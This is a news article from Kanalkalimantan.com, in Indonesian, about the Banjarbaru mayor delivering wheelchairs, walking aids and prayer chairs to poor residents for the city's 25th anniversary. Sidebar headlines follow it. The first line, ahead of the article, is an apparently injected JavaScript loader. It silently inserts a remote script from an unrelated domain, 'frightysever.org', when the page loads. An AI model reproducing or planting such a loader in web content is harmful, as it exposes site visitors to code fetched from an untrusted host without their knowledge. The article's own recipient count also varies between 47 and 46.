(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Riding Bersama Wali Kota, Salurkan Bansos Hari Jadi ke-25 Kota Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 47 warga di Banjarbaru menerima bantuan sosial (bansos) dari Pemerintah Kota Banjarbaru dalam rangka Hari Jadi ke-25 Kota Banjarbaru.

Penyaluran bantuan secara langsung diserahkan Wali Kota Banjarbaru Aditya Mufti Ariffin ke rumah-rumah warga pemerlu Pelayanan Kesejahteraan Sosial (PPKS), Rabu (17/4/2024) siang.

Wali Kota Aditya mengatakan, dalam rangka Hari Jadi Kota Banjarbaru ada 72 penerima bansos dan yang direalisasikan 46 orang kurang mampu.

Baca juga: Serahkan Bantuan Operasional Lapangan Aparat Penegak Hukum 

“Bantuan ini kita berikan bukan hanya tahun ini, tahun kemaren juga ada, dan dari 72 penerima, kita realisasikan kepada 46 orang yang membutuhkan yang sudah terdata dan diverifikasi oleh kelurahan setempat,” ujar Aditya Mufti Ariffin.

Penyaluran bansos dilakukan langsung ke rumah-rumah warga digelar dengan riding Wali Kota Banjarbaru bersama komunitas sepeda motor.

Riding bersama Wali Kota menyusuri permukiman warga ibu jota, salah satunya rumah warga di bantaran Sungai Kemuning, Jalan Rambai, Kelurahan Guntung Paikat, Kecamatan Banjarbaru Selatan Kota Banjarbaru.

Baca juga: Sampaikan Rekomendasi LKPj Bupati HSU 2023, Ini Kata Ketua Komisi II 

“Kita sekaligus melihat kondisi dan keadaan masyarakat, khususnya yang kekurangan dan yang membutuhkan,” sebut dia.

Dari peninjauan itu, sambung dia, pemerintah akan mengevakuasi bersama berkaitan bagaimana kebutuhan dan pembangunan di masa yang akan datang, termasuk juga pelayanan di Kota Banjarbaru agar lebih baik.

“Seperti warga yang daerahnya sering banjir, kita berikan bantuan sekaligus kita tinjau bagaimana keadaan di tahun ini,” ungkapnya.

Baca juga: Semarak Berbelanja Pasar Bauntung, Upaya Pemko Banjarbaru Tarik Pengunjung

“Seperti kata mereka banjir di bantaran Sungai Kemuning di tahun ini dapat teratasi dengan adanya embung, tinggal bagaimana kita merawat embung ini agar dapat dimanfaatkan secara berkelanjutan,” jelas dia.

Salah seorang warga penerima bansos, Siti Salmah (64) merasa terharu dengan bantuan yang diberikan yakni berupa kursi untuk salat.

“Alhamdulillah dapat kursi salat sama bingkisan, mengingat saya salat tidak bisa berdiri, cuma duduk aja, kakinya tidak bisa dilipat, dan kalau jalan jauh tidak kuat,” ungkap Siti Salmah yang tinggal di bantaran Sungai Kemuning sejak tahun 1982 ini.

Di sisi lain dirinya yang telah berpuluh-puluh tahun tinggal di lingkungan langganan banjir ini mengaku tahun ini bisa terhindar dari bencana itu.

Baca juga: Bupati Banjar Lepas DPC APDESI Kabupaten Banjar Ikuti Pelantikan DPD APDESI Kalsel

Dia juga berharap bantuan ini dapat selalu disalurkan kepada warga yang membutuhkan.

“Kalau bisa dapat bantuan terus mengingat kita warga golongan kecil, dan cukup sering terdampak banjir, tapi untungnya ini belum ada banjir paling sampai di bawah rumah aja,” katanya.

Sekadar diketahui 46 bansos yang diberikan kepada masyarakat meliputi 19 kursi roda, 11 tongkat tripot, 4 tongkat wolker, dan 12 kursi salat. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

2 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

3 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

4 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

5 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

5 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

6 jam ago

This website uses cookies.